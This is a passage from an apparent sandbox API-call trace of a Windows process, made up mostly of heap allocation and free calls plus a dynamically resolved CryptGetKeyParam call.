lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0175.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0175.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0175.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0175.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d440 [0175.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0175.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0175.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.162] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0175.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0175.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0175.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0175.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0175.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0175.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0175.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0175.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0175.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0175.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0175.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0175.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0175.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0175.163] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c26e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0175.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0175.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0175.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0175.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0175.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0175.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0175.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0175.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0175.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0175.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0175.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0175.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0175.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0175.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0175.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0175.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0175.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0175.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0175.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0175.168] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0175.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0175.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0175.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0175.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0175.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0175.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0175.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0175.169] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0175.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0175.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0175.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0175.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0175.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0175.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0175.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0175.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0175.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0175.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0175.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0175.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0175.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0175.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.171] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0175.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0175.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0175.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.171] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0175.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0175.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0175.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0175.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0175.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.172] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.172] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0175.172] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0175.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0175.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0175.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0175.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0175.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.173] RtlAllocateHeap (HeapHandle=0x8a0000, 